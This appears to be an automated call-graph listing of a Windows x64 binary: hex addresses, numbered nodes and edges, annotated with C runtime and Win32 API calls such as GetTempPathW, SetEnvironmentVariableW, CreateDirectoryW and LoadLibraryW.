7ff6e3a62cd5 17216->17218 17219 7ff6e3a62d27 17217->17219 17220 7ff6e3a68bd0 57 API calls 17218->17220 17222 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17219->17222 17221 7ff6e3a62cef MessageBoxW 17220->17221 17221->17219 17223 7ff6e3a62d37 17222->17223 17223->16401 17225 7ff6e3a75352 17224->17225 17226 7ff6e3a75377 17225->17226 17228 7ff6e3a753b3 17225->17228 17227 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17226->17227 17230 7ff6e3a753a1 17227->17230 17242 7ff6e3a736b0 17228->17242 17232 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17230->17232 17231 7ff6e3a75494 17233 7ff6e3a7b4ec __free_lconv_num 11 API calls 17231->17233 17234 7ff6e3a68788 17232->17234 17233->17230 17234->16398 17236 7ff6e3a754ba 17236->17231 17238 7ff6e3a754c4 17236->17238 17237 7ff6e3a75469 17239 7ff6e3a7b4ec __free_lconv_num 11 API calls 17237->17239 17241 7ff6e3a7b4ec __free_lconv_num 11 API calls 17238->17241 17239->17230 17240 7ff6e3a75460 17240->17231 17240->17237 17241->17230 17243 7ff6e3a736ee 17242->17243 17244 7ff6e3a736de 17242->17244 17245 7ff6e3a736f7 17243->17245 17250 7ff6e3a73725 17243->17250 17248 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17244->17248 17246 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17245->17246 17247 7ff6e3a7371d 17246->17247 17247->17231 17247->17236 17247->17237 17247->17240 17248->17247 17250->17244 17250->17247 17253 7ff6e3a740c4 17250->17253 17286 7ff6e3a73b10 17250->17286 17323 7ff6e3a732a0 17250->17323 17254 7ff6e3a74106 17253->17254 17255 7ff6e3a74177 17253->17255 17256 7ff6e3a7410c 17254->17256 17257 7ff6e3a741a1 17254->17257 17258 7ff6e3a7417c 17255->17258 17259 7ff6e3a741d0 17255->17259 17260 7ff6e3a74140 17256->17260 17261 7ff6e3a74111 17256->17261 17342 7ff6e3a72474 17257->17342 17262 7ff6e3a741b1 17258->17262 17263 7ff6e3a7417e 17258->17263 17265 7ff6e3a741e7 17259->17265 17267 7ff6e3a741da 17259->17267 17271 7ff6e3a741df 17259->17271 17268 7ff6e3a74117 17260->17268 17260->17271 17261->17265 17261->17268 17349 7ff6e3a72064 17262->17349 17266 7ff6e3a74120 17263->17266 17275 7ff6e3a7418d 17263->17275 17356 7ff6e3a74dcc 17265->17356 17284 7ff6e3a74210 17266->17284 17326 7ff6e3a74878 17266->17326 17267->17257 17267->17271 17268->17266 17274 7ff6e3a74152 17268->17274 17282 7ff6e3a7413b 17268->17282 17271->17284 17360 7ff6e3a72884 17271->17360 17274->17284 17336 7ff6e3a74bb4 17274->17336 17275->17257 17277 7ff6e3a74192 17275->17277 17280 7ff6e3a74c78 37 API calls 17277->17280 17277->17284 17278 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17279 7ff6e3a7450a 17278->17279 17279->17250 17280->17282 17281 7ff6e3a74ee0 45 API calls 17285 7ff6e3a743fc 17281->17285 17282->17281 17282->17284 17282->17285 17284->17278 17285->17284 17367 7ff6e3a7f5a8 17285->17367 17287 7ff6e3a73b34 17286->17287 17288 7ff6e3a73b1e 17286->17288 17291 7ff6e3a73b74 17287->17291 17292 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17287->17292 17289 7ff6e3a74106 17288->17289 17290 7ff6e3a74177 17288->17290 17288->17291 17293 7ff6e3a7410c 17289->17293 17294 7ff6e3a741a1 17289->17294 17295 7ff6e3a7417c 17290->17295 17296 7ff6e3a741d0 17290->17296 17291->17250 17292->17291 17297 7ff6e3a74140 17293->17297 17298 7ff6e3a74111 17293->17298 17301 7ff6e3a72474 38 API calls 17294->17301 17299 7ff6e3a741b1 17295->17299 17300 7ff6e3a7417e 17295->17300 17302 7ff6e3a741e7 17296->17302 17304 7ff6e3a741da 17296->17304 17308 7ff6e3a741df 17296->17308 17305 7ff6e3a74117 17297->17305 17297->17308 17298->17302 17298->17305 17306 7ff6e3a72064 38 API calls 17299->17306 17303 7ff6e3a74120 17300->17303 17312 7ff6e3a7418d 17300->17312 17318 7ff6e3a7413b 17301->17318 17309 7ff6e3a74dcc 45 API calls 17302->17309 17307 7ff6e3a74878 47 API calls 17303->17307 17322 7ff6e3a74210 17303->17322 17304->17294 17304->17308 17305->17303 17310 7ff6e3a74152 17305->17310 17305->17318 17306->17318 17307->17318 17311 7ff6e3a72884 38 API calls 17308->17311 17308->17322 17309->17318 17313 7ff6e3a74bb4 46 API calls 17310->17313 17310->17322 17311->17318 17312->17294 17314 7ff6e3a74192 17312->17314 17313->17318 17317 7ff6e3a74c78 37 API calls 17314->17317 17314->17322 17315 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17316 7ff6e3a7450a 17315->17316 17316->17250 17317->17318 17319 7ff6e3a74ee0 45 API calls 17318->17319 17321 7ff6e3a743fc 17318->17321 17318->17322 17319->17321 17320 7ff6e3a7f5a8 46 API calls 17320->17321 17321->17320 17321->17322 17322->17315 17401 7ff6e3a716e8 17323->17401 17327 7ff6e3a7489e 17326->17327 17328 7ff6e3a712a0 12 API calls 17327->17328 17329 7ff6e3a748ee 17328->17329 17330 7ff6e3a7f110 46 API calls 17329->17330 17332 7ff6e3a749c1 17330->17332 17331 7ff6e3a749e3 17334 7ff6e3a74a71 17331->17334 17335 7ff6e3a74ee0 45 API calls 17331->17335 17332->17331 17333 7ff6e3a74ee0 45 API calls 17332->17333 17333->17331 17334->17282 17335->17334 17338 7ff6e3a74be9 17336->17338 17337 7ff6e3a74c07 17341 7ff6e3a7f5a8 46 API calls 17337->17341 17338->17337 17339 7ff6e3a74c2e 17338->17339 17340 7ff6e3a74ee0 45 API calls 17338->17340 17339->17282 17340->17337 17341->17339 17343 7ff6e3a724a7 17342->17343 17344 7ff6e3a724d6 17343->17344 17346 7ff6e3a72593 17343->17346 17348 7ff6e3a72513 17344->17348 17379 7ff6e3a71348 17344->17379 17347 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17346->17347 17347->17348 17348->17282 17350 7ff6e3a72097 17349->17350 17351 7ff6e3a720c6 17350->17351 17353 7ff6e3a72183 17350->17353 17352 7ff6e3a71348 12 API calls 17351->17352 17355 7ff6e3a72103 17351->17355 17352->17355 17354 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17353->17354 17354->17355 17355->17282 17357 7ff6e3a74e0f 17356->17357 17359 7ff6e3a74e13 __crtLCMapStringW 17357->17359 17387 7ff6e3a74e68 17357->17387 17359->17282 17361 7ff6e3a728b7 17360->17361 17362 7ff6e3a728e6 17361->17362 17364 7ff6e3a729a3 17361->17364 17363 7ff6e3a71348 12 API calls 17362->17363 17366 7ff6e3a72923 17362->17366 17363->17366 17365 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17364->17365 17365->17366 17366->17282 17369 7ff6e3a7f5d9 17367->17369 17377 7ff6e3a7f5e7 17367->17377 17368 7ff6e3a7f607 17371 7ff6e3a7f618 17368->17371 17372 7ff6e3a7f63f 17368->17372 17369->17368 17370 7ff6e3a74ee0 45 API calls 17369->17370 17369->17377 17370->17368 17391 7ff6e3a81060 17371->17391 17374 7ff6e3a7f6ca 17372->17374 17375 7ff6e3a7f669 17372->17375 17372->17377 17376 7ff6e3a801e0 _fread_nolock MultiByteToWideChar 17374->17376 17375->17377 17394 7ff6e3a801e0 17375->17394 17376->17377 17377->17285 17380 7ff6e3a7137f 17379->17380 17386 7ff6e3a7136e 17379->17386 17381 7ff6e3a7e19c _fread_nolock 12 API calls 17380->17381 17380->17386 17382 7ff6e3a713b0 17381->17382 17384 7ff6e3a7b4ec __free_lconv_num 11 API calls 17382->17384 17385 7ff6e3a713c4 17382->17385 17383 7ff6e3a7b4ec __free_lconv_num 11 API calls 17383->17386 17384->17385 17385->17383 17386->17348 17388 7ff6e3a74e86 17387->17388 17389 7ff6e3a74e8e 17387->17389 17390 7ff6e3a74ee0 45 API calls 17388->17390 17389->17359 17390->17389 17397 7ff6e3a87cc0 17391->17397 17396 7ff6e3a801e9 MultiByteToWideChar 17394->17396 17400 7ff6e3a87d24 17397->17400 17398 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17399 7ff6e3a8107d 17398->17399 17399->17377 17400->17398 17402 7ff6e3a7171d 17401->17402 17403 7ff6e3a7172f 17401->17403 17404 7ff6e3a75aa4 _get_daylight 11 API calls 17402->17404 17406 7ff6e3a7173d 17403->17406 17409 7ff6e3a71779 17403->17409 17405 7ff6e3a71722 17404->17405 17407 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17405->17407 17408 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17406->17408 17415 7ff6e3a7172d 17407->17415 17408->17415 17410 7ff6e3a71af5 17409->17410 17412 7ff6e3a75aa4 _get_daylight 11 API calls 17409->17412 17411 7ff6e3a75aa4 _get_daylight 11 API calls 17410->17411 17410->17415 17413 7ff6e3a71d89 17411->17413 17414 7ff6e3a71aea 17412->17414 17416 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17413->17416 17417 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17414->17417 17415->17250 17416->17415 17417->17410 17419 7ff6e3a67966 17418->17419 17420 7ff6e3a6798a 17419->17420 17421 7ff6e3a679dd GetTempPathW 17419->17421 17422 7ff6e3a67b60 61 API calls 17420->17422 17423 7ff6e3a679f2 17421->17423 17424 7ff6e3a67996 17422->17424 17457 7ff6e3a62810 17423->17457 17469 7ff6e3a67420 17424->17469 17431 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17433 7ff6e3a6153f 17431->17433 17433->16408 17433->16409 17434 7ff6e3a67ab6 17438 7ff6e3a68ce0 59 API calls 17434->17438 17435 7ff6e3a67a0b __std_exception_copy 17435->17434 17440 7ff6e3a67a41 17435->17440 17461 7ff6e3a79084 17435->17461 17464 7ff6e3a68b70 17435->17464 17442 7ff6e3a67ac7 __std_exception_copy 17438->17442 17441 7ff6e3a68bd0 57 API calls 17440->17441 17452 7ff6e3a67a7a __std_exception_copy 17440->17452 17443 7ff6e3a67a57 17441->17443 17444 7ff6e3a68bd0 57 API calls 17442->17444 17442->17452 17445 7ff6e3a67a5c 17443->17445 17446 7ff6e3a67a99 SetEnvironmentVariableW 17443->17446 17447 7ff6e3a67ae5 17444->17447 17448 7ff6e3a68bd0 57 API calls 17445->17448 17446->17452 17449 7ff6e3a67aea 17447->17449 17450 7ff6e3a67b1d SetEnvironmentVariableW 17447->17450 17453 7ff6e3a67a6c 17448->17453 17451 7ff6e3a68bd0 57 API calls 17449->17451 17450->17452 17454 7ff6e3a67afa 17451->17454 17452->17431 17455 7ff6e3a783cc 38 API calls 17453->17455 17456 7ff6e3a783cc 38 API calls 17454->17456 17455->17452 17456->17452 17458 7ff6e3a62835 17457->17458 17459 7ff6e3a752f8 48 API calls 17458->17459 17460 7ff6e3a62854 17459->17460 17460->17435 17503 7ff6e3a78cb0 17461->17503 17465 7ff6e3a68b96 CreateDirectoryW 17464->17465 17466 7ff6e3a68b80 17464->17466 17465->17435 17467 7ff6e3a62c30 59 API calls 17466->17467 17468 7ff6e3a68b8c 17467->17468 17468->17435 17470 7ff6e3a6742c 17469->17470 17471 7ff6e3a68bd0 57 API calls 17470->17471 17472 7ff6e3a6744e 17471->17472 17473 7ff6e3a67456 17472->17473 17474 7ff6e3a67469 ExpandEnvironmentStringsW 17472->17474 17475 7ff6e3a62b10 59 API calls 17473->17475 17476 7ff6e3a6748f __std_exception_copy 17474->17476 17482 7ff6e3a67462 17475->17482 17477 7ff6e3a674a6 17476->17477 17478 7ff6e3a67493 17476->17478 17483 7ff6e3a674b4 17477->17483 17484 7ff6e3a674c0 17477->17484 17480 7ff6e3a62b10 59 API calls 17478->17480 17479 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17481 7ff6e3a67588 17479->17481 17480->17482 17481->17452 17493 7ff6e3a783cc 17481->17493 17482->17479 17634 7ff6e3a77f84 17483->17634 17641 7ff6e3a76908 17484->17641 17487 7ff6e3a674be 17488 7ff6e3a674da 17487->17488 17491 7ff6e3a674ed __scrt_get_show_window_mode 17487->17491 17489 7ff6e3a62b10 59 API calls 17488->17489 17489->17482 17490 7ff6e3a67562 CreateDirectoryW 17490->17482 17491->17490 17494 7ff6e3a783ec 17493->17494 17495 7ff6e3a783d9 17493->17495 17742 7ff6e3a78050 17494->17742 17496 7ff6e3a75aa4 _get_daylight 11 API calls 17495->17496 17544 7ff6e3a821a8 17503->17544 17603 7ff6e3a81f20 17544->17603 17624 7ff6e3a81298 EnterCriticalSection 17603->17624 17635 7ff6e3a77fa2 17634->17635 17638 7ff6e3a77fd5 17634->17638 17635->17638 17653 7ff6e3a81434 17635->17653 17638->17487 17642 7ff6e3a76924 17641->17642 17643 7ff6e3a76992 17641->17643 17642->17643 17645 7ff6e3a76929 17642->17645 17687 7ff6e3a80a80 17643->17687 17647 7ff6e3a76941 17645->17647 17648 7ff6e3a7695e 17645->17648 17654 7ff6e3a81441 17653->17654 17655 7ff6e3a8144b 17653->17655 17654->17655 17690 7ff6e3a80890 17687->17690 17691 7ff6e3a808bb 17690->17691 17692 7ff6e3a808d2 17690->17692 17749 7ff6e3a81298 EnterCriticalSection 17742->17749 17751 7ff6e3a61716 17750->17751 17752 7ff6e3a6172e 17750->17752 17755 7ff6e3a62b10 59 API calls 17751->17755 17753 7ff6e3a61758 17752->17753 17754 7ff6e3a61734 17752->17754 17843 7ff6e3a67c10 17753->17843 17880 7ff6e3a612a0 17754->17880 17758 7ff6e3a61722 17755->17758 17758->16433 17761 7ff6e3a6174f 17761->16433 17762 7ff6e3a6177d 17765 7ff6e3a62870 59 API calls 17762->17765 17763 7ff6e3a617a9 17766 7ff6e3a63fc0 116 API calls 17763->17766 17764 7ff6e3a62b10 59 API calls 17764->17761 17767 7ff6e3a61793 17765->17767 17768 7ff6e3a617be 17766->17768 17767->16433 17769 7ff6e3a617c6 17768->17769 17770 7ff6e3a617de 17768->17770 17771 7ff6e3a62b10 59 API calls 17769->17771 17772 7ff6e3a70df4 73 API calls 17770->17772 17773 7ff6e3a617d5 17771->17773 17774 7ff6e3a617ef 17772->17774 17778 7ff6e3a7076c 74 API calls 17773->17778 17775 7ff6e3a61813 17774->17775 17776 7ff6e3a617f3 17774->17776 17779 7ff6e3a61819 17775->17779 17780 7ff6e3a61831 17775->17780 17777 7ff6e3a62870 59 API calls 17776->17777 17781 7ff6e3a61809 __std_exception_copy 17777->17781 17782 7ff6e3a61927 17778->17782 17862 7ff6e3a61050 17779->17862 17784 7ff6e3a61853 17780->17784 17789 7ff6e3a61872 17780->17789 17785 7ff6e3a7076c 74 API calls 17781->17785 17782->16433 17786 7ff6e3a62870 59 API calls 17784->17786 17785->17773 17786->17781 17787 7ff6e3a70abc _fread_nolock 53 API calls 17787->17789 17788 7ff6e3a618d5 17791 7ff6e3a62870 59 API calls 17788->17791 17789->17781 17789->17787 17789->17788 17919 7ff6e3a711fc 17789->17919 17791->17781 17793 7ff6e3a62d66 17792->17793 17794 7ff6e3a61ee0 49 API calls 17793->17794 17796 7ff6e3a62d99 17794->17796 17795 7ff6e3a630ca 17796->17795 17797 7ff6e3a63e30 49 API calls 17796->17797 17798 7ff6e3a62e07 17797->17798 17799 7ff6e3a63e30 49 API calls 17798->17799 17800 7ff6e3a62e18 17799->17800 17801 7ff6e3a62e39 17800->17801 17802 7ff6e3a62e75 17800->17802 18002 7ff6e3a63190 17801->18002 17804 7ff6e3a63190 75 API calls 17802->17804 17805 7ff6e3a62e73 17804->17805 17806 7ff6e3a62ef6 17805->17806 17807 7ff6e3a62eb4 17805->17807 17808 7ff6e3a63190 75 API calls 17806->17808 18010 7ff6e3a675a0 17807->18010 17810 7ff6e3a62f20 17808->17810 17814 7ff6e3a63190 75 API calls 17810->17814 17819 7ff6e3a62fbc 17810->17819 17813 7ff6e3a63151 17821 7ff6e3a62b10 59 API calls 17813->17821 17817 7ff6e3a62f52 17814->17817 17816 7ff6e3a62ef1 17823 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17816->17823 17817->17819 17822 7ff6e3a63190 75 API calls 17817->17822 17818 7ff6e3a61ea0 59 API calls 17820 7ff6e3a6300f 17818->17820 17819->17818 17832 7ff6e3a630cf 17819->17832 17820->17795 17825 7ff6e3a61ee0 49 API calls 17820->17825 17821->17795 17824 7ff6e3a62f80 17822->17824 17826 7ff6e3a62fb1 17823->17826 17824->17819 17827 7ff6e3a62f84 17824->17827 17828 7ff6e3a63037 17825->17828 17826->16433 17829 7ff6e3a62b10 59 API calls 17827->17829 17828->17813 17831 7ff6e3a61ee0 49 API calls 17828->17831 17829->17816 17830 7ff6e3a62b10 59 API calls 17836 7ff6e3a63128 17830->17836 17834 7ff6e3a63064 17831->17834 17832->17836 18047 7ff6e3a75650 17832->18047 17834->17813 17835 7ff6e3a61ee0 49 API calls 17834->17835 17837 7ff6e3a63091 17835->17837 17836->17813 17836->17830 17838 7ff6e3a61700 135 API calls 17836->17838 17837->17813 17839 7ff6e3a61a90 121 API calls 17837->17839 17838->17836 17844 7ff6e3a67c20 17843->17844 17845 7ff6e3a61ee0 49 API calls 17844->17845 17846 7ff6e3a67c61 17845->17846 17847 7ff6e3a67ce1 17846->17847 17923 7ff6e3a63f50 17846->17923 17849 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17847->17849 17851 7ff6e3a61775 17849->17851 17851->17762 17851->17763 17852 7ff6e3a67d1b 17929 7ff6e3a677c0 17852->17929 17854 7ff6e3a67b60 61 API calls 17859 7ff6e3a67c92 __std_exception_copy 17854->17859 17856 7ff6e3a67d04 17858 7ff6e3a62c30 59 API calls 17856->17858 17857 7ff6e3a67cd0 17860 7ff6e3a62c30 59 API calls 17857->17860 17858->17852 17859->17856 17859->17857 17860->17847 17861 7ff6e3a63fc0 116 API calls 17861->17847 17863 7ff6e3a610a6 17862->17863 17864 7ff6e3a610ad 17863->17864 17865 7ff6e3a610d3 17863->17865 17866 7ff6e3a62b10 59 API calls 17864->17866 17868 7ff6e3a610ed 17865->17868 17869 7ff6e3a61109 17865->17869 17867 7ff6e3a610c0 17866->17867 17867->17781 17870 7ff6e3a62870 59 API calls 17868->17870 17871 7ff6e3a6111b 17869->17871 17878 7ff6e3a61137 memcpy_s 17869->17878 17874 7ff6e3a61104 __std_exception_copy 17870->17874 17872 7ff6e3a62870 59 API calls 17871->17872 17872->17874 17874->17781 17878->17874 17881 7ff6e3a612b2 17880->17881 17882 7ff6e3a63fc0 116 API calls 17881->17882 17883 7ff6e3a612e2 17882->17883 17884 7ff6e3a612ea 17883->17884 17885 7ff6e3a61301 17883->17885 17886 7ff6e3a62b10 59 API calls 17884->17886 17887 7ff6e3a70df4 73 API calls 17885->17887 17892 7ff6e3a612fa __std_exception_copy 17886->17892 17888 7ff6e3a61313 17887->17888 17889 7ff6e3a6133d 17888->17889 17890 7ff6e3a61317 17888->17890 17894 7ff6e3a61358 17889->17894 17895 7ff6e3a61380 17889->17895 17891 7ff6e3a62870 59 API calls 17890->17891 17893 7ff6e3a6132e 17891->17893 17896 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17892->17896 17897 7ff6e3a7076c 74 API calls 17893->17897 17898 7ff6e3a62870 59 API calls 17894->17898 17899 7ff6e3a6139a 17895->17899 17911 7ff6e3a61453 17895->17911 17900 7ff6e3a61444 17896->17900 17897->17892 17901 7ff6e3a61373 17898->17901 17902 7ff6e3a61050 98 API calls 17899->17902 17900->17761 17900->17764 17904 7ff6e3a7076c 74 API calls 17901->17904 17905 7ff6e3a613ab 17902->17905 17903 7ff6e3a613b3 17906 7ff6e3a7076c 74 API calls 17903->17906 17904->17892 17905->17903 17907 7ff6e3a614c2 __std_exception_copy 17905->17907 17908 7ff6e3a613bf 17906->17908 17915 7ff6e3a7076c 74 API calls 17907->17915 17910 7ff6e3a677c0 64 API calls 17908->17910 17909 7ff6e3a70abc _fread_nolock 53 API calls 17909->17911 17913 7ff6e3a613ce 17910->17913 17911->17903 17911->17909 17912 7ff6e3a614ab 17911->17912 17914 7ff6e3a62870 59 API calls 17912->17914 17913->17892 17916 7ff6e3a61ee0 49 API calls 17913->17916 17914->17907 17915->17892 17917 7ff6e3a613fc 17916->17917 17917->17892 17973 7ff6e3a64160 17917->17973 17920 7ff6e3a7122c 17919->17920 17987 7ff6e3a70f4c 17920->17987 17922 7ff6e3a7124a 17922->17789 17924 7ff6e3a63f5a 17923->17924 17925 7ff6e3a68bd0 57 API calls 17924->17925 17926 7ff6e3a63f82 17925->17926 17927 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17926->17927 17928 7ff6e3a63faa 17927->17928 17928->17852 17928->17854 17928->17859 17930 7ff6e3a677d0 17929->17930 17931 7ff6e3a61ee0 49 API calls 17930->17931 17932 7ff6e3a67801 17931->17932 17933 7ff6e3a67919 17932->17933 17934 7ff6e3a61ee0 49 API calls 17932->17934 17935 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17933->17935 17937 7ff6e3a67828 17934->17937 17936 7ff6e3a6792e 17935->17936 17936->17847 17936->17861 17937->17933 17943 7ff6e3a766a8 17937->17943 17944 7ff6e3a7bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17943->17944 17945 7ff6e3a766bd 17944->17945 17946 7ff6e3a80887 17945->17946 17951 7ff6e3a807a6 17945->17951 17974 7ff6e3a64170 17973->17974 17975 7ff6e3a68bd0 57 API calls 17974->17975 17976 7ff6e3a6419e 17975->17976 17988 7ff6e3a70f6c 17987->17988 17993 7ff6e3a70f99 17987->17993 17989 7ff6e3a70f76 17988->17989 17990 7ff6e3a70fa1 17988->17990 17988->17993 17993->17922 18003 7ff6e3a631c4 18002->18003 18004 7ff6e3a750a4 49 API calls 18003->18004 18005 7ff6e3a631ea 18004->18005 18006 7ff6e3a631fb 18005->18006 18062 7ff6e3a763cc 18005->18062 18008 7ff6e3a6be00 _wfindfirst32i64 8 API calls 18006->18008 18009 7ff6e3a63219 18008->18009 18009->17805 18011 7ff6e3a675ae 18010->18011 18012 7ff6e3a63fc0 116 API calls 18011->18012 18013 7ff6e3a675dd 18012->18013 18014 7ff6e3a61ee0 49 API calls 18013->18014 18015 7ff6e3a67606 18014->18015 18016 7ff6e3a63f50 57 API calls 18015->18016 18017 7ff6e3a6760d 18015->18017 18019 7ff6e3a67620 18016->18019 18018 7ff6e3a67789 18017->18018 18022 7ff6e3a676e9 18017->18022 18021 7ff6e3a67785 18018->18021 18024 7ff6e3a7076c 74 API calls 18018->18024 18020 7ff6e3a676a4 18019->18020 18029 7ff6e3a67b60 61 API calls 18019->18029 18035 7ff6e3a6763e __std_exception_copy 18019->18035 18025 7ff6e3a677c0 64 API calls 18020->18025 18028 7ff6e3a6be00 _wfindfirst32i64 8 API calls 18021->18028 18243 7ff6e3a70804 18022->18243 18024->18021 18030 7ff6e3a676af 18025->18030 18026 7ff6e3a67677 18031 7ff6e3a62c30 59 API calls 18026->18031 18027 7ff6e3a6768d 18034 7ff6e3a62c30 59 API calls 18027->18034 18033 7ff6e3a62ece 18028->18033 18029->18035 18030->18017 18031->18017 18033->17813 18034->18020 18035->18026 18035->18027 18045 7ff6e3a676ee 18048 7ff6e3a7565d 18047->18048 18049 7ff6e3a7568a 18047->18049 18050 7ff6e3a75aa4 _get_daylight 11 API calls 18048->18050 18051 7ff6e3a75614 18048->18051 18052 7ff6e3a756ad 18049->18052 18055 7ff6e3a756c9 18049->18055 18053 7ff6e3a75667 18050->18053 18051->17832 18054 7ff6e3a75aa4 _get_daylight 11 API calls 18052->18054 18056 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 18053->18056 18057 7ff6e3a756b2 18054->18057 18058 7ff6e3a75578 45 API calls 18055->18058 18059 7ff6e3a75672 18056->18059 18060 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 18057->18060 18061 7ff6e3a756bd 18058->18061 18059->17832 18060->18061 18061->17832 18063 7ff6e3a763e9 18062->18063 18064 7ff6e3a763f5 18062->18064 18079 7ff6e3a75ce0 18063->18079 18104 7ff6e3a75578 18064->18104 18067 7ff6e3a763ee 18067->18006 18071 7ff6e3a7642d 18115 7ff6e3a75b64 18071->18115 18073 7ff6e3a7649d 18075 7ff6e3a75ce0 69 API calls 18073->18075 18074 7ff6e3a76489 18074->18067 18076 7ff6e3a7b4ec __free_lconv_num 11 API calls 18074->18076 18077 7ff6e3a764a9 18075->18077 18076->18067 18077->18067 18080 7ff6e3a75cfa 18079->18080 18081 7ff6e3a75d17 18079->18081 18083 7ff6e3a75a84 _fread_nolock 11 API calls 18080->18083 18081->18080 18082 7ff6e3a75d2a CreateFileW 18081->18082 18084 7ff6e3a75d94 18082->18084 18085 7ff6e3a75d5e 18082->18085 18086 7ff6e3a75cff 18083->18086 18163 7ff6e3a762bc 18084->18163 18137 7ff6e3a75e34 GetFileType 18085->18137 18089 7ff6e3a75aa4 _get_daylight 11 API calls 18086->18089 18092 7ff6e3a75d07 18089->18092 18097 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 18092->18097 18099 7ff6e3a75d12 18097->18099 18099->18067 18105 7ff6e3a7559c 18104->18105 18111 7ff6e3a75597 18104->18111 18106 7ff6e3a7bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18105->18106 18105->18111 18107 7ff6e3a755b7 18106->18107 18225 7ff6e3a7e524 18107->18225 18111->18071 18112 7ff6e3a7f9c4 18111->18112 18233 7ff6e3a7f7b0 18112->18233 18116 7ff6e3a75bb2 18115->18116 18117 7ff6e3a75b8e 18115->18117 18118 7ff6e3a75c0c 18116->18118 18119 7ff6e3a75bb7 18116->18119 18121 7ff6e3a7b4ec __free_lconv_num 11 API calls 18117->18121 18125 7ff6e3a75b9d 18117->18125 18120 7ff6e3a801e0 _fread_nolock MultiByteToWideChar 18118->18120 18122 7ff6e3a75bcc 18119->18122 18119->18125 18126 7ff6e3a7b4ec __free_lconv_num 11 API calls 18119->18126 18131 7ff6e3a75c28 18120->18131 18121->18125 18123 7ff6e3a7e19c _fread_nolock 12 API calls 18122->18123 18123->18125 18124 7ff6e3a75c2f GetLastError 18125->18073 18125->18074 18126->18122 18128 7ff6e3a75c6a 18128->18125 18131->18124 18131->18128 18132 7ff6e3a75c5d 18131->18132 18136 7ff6e3a7b4ec __free_lconv_num 11 API calls 18131->18136 18136->18132 18138 7ff6e3a75e82 18137->18138 18139 7ff6e3a75f3f 18137->18139 18140 7ff6e3a75eae GetFileInformationByHandle 18138->18140 18144 7ff6e3a761b8 21 API calls 18138->18144 18141 7ff6e3a75f69 18139->18141 18142 7ff6e3a75f47 18139->18142 18145 7ff6e3a75f5a GetLastError 18140->18145 18146 7ff6e3a75ed7 18140->18146 18143 7ff6e3a75f8c PeekNamedPipe 18141->18143 18161 7ff6e3a75f2a 18141->18161 18142->18145 18147 7ff6e3a75f4b 18142->18147 18143->18161 18152 7ff6e3a75e9c 18144->18152 18152->18140 18152->18161 18164 7ff6e3a762f2 18163->18164 18165 7ff6e3a75aa4 _get_daylight 11 API calls 18164->18165 18182 7ff6e3a7638a __std_exception_copy 18164->18182 18167 7ff6e3a76304 18165->18167 18166 7ff6e3a6be00 _wfindfirst32i64 8 API calls 18182->18166 18226 7ff6e3a7e539 18225->18226 18227 7ff6e3a755da 18225->18227 18226->18227 18228 7ff6e3a83f54 45 API calls 18226->18228 18229 7ff6e3a7e590 18227->18229 18228->18227 18230 7ff6e3a7e5b8 18229->18230 18231 7ff6e3a7e5a5 18229->18231 18230->18111 18231->18230 18232 7ff6e3a832a0 45 API calls 18231->18232 18232->18230 18234 7ff6e3a7f808 __vcrt_InitializeCriticalSectionEx 18233->18234 18235 7ff6e3a7f80d 18233->18235 18234->18235 18236 7ff6e3a7f83d LoadLibraryW 18234->18236 18237 7ff6e3a7f932 GetProcAddress 18234->18237 18242 7ff6e3a7f89c LoadLibraryExW 18234->18242 18235->18071 18238 7ff6e3a7f912 18236->18238 18239 7ff6e3a7f862 GetLastError 18236->18239 18237->18235 18241 7ff6e3a7f943 18237->18241 18238->18237 18240 7ff6e3a7f929 FreeLibrary 18238->18240 18239->18234 18240->18237 18241->18235 18242->18234 18242->18238 18244 7ff6e3a7080d 18243->18244 18245 7ff6e3a7081d 18243->18245 18246 7ff6e3a75aa4 _get_daylight 11 API calls 18244->18246 18245->18045 18247 7ff6e3a70812 18246->18247 18270 7ff6e3a7affd 18269->18270 18271 7ff6e3a6812a 18269->18271 18272 7ff6e3a75aa4 _get_daylight 11 API calls 18270->18272 18275 7ff6e3a78c10 18271->18275 18273 7ff6e3a7b002 18272->18273 18276 7ff6e3a78c19 18275->18276 18280 7ff6e3a78c2e 18275->18280 18326 7ff6e3a769bc 18325->18326 18327 7ff6e3a769e2 18326->18327 18329 7ff6e3a76a15 18326->18329 18328 7ff6e3a75aa4 _get_daylight 11 API calls 18327->18328 18330 7ff6e3a769e7 18328->18330 18331 7ff6e3a76a1b 18329->18331 18332 7ff6e3a76a28 18329->18332 18333 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 18330->18333 18334 7ff6e3a75aa4 _get_daylight 11 API calls 18331->18334 18344 7ff6e3a7b7cc 18332->18344 18336 7ff6e3a64019 18333->18336 18334->18336 18336->16508 18357 7ff6e3a81298 EnterCriticalSection 18344->18357 18705 7ff6e3a79680 18704->18705 18708 7ff6e3a7915c 18705->18708 18707 7ff6e3a79699 18707->16516 18709 7ff6e3a79177 18708->18709 18710 7ff6e3a791a6 18708->18710 18711 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 18709->18711 18718 7ff6e3a7594c 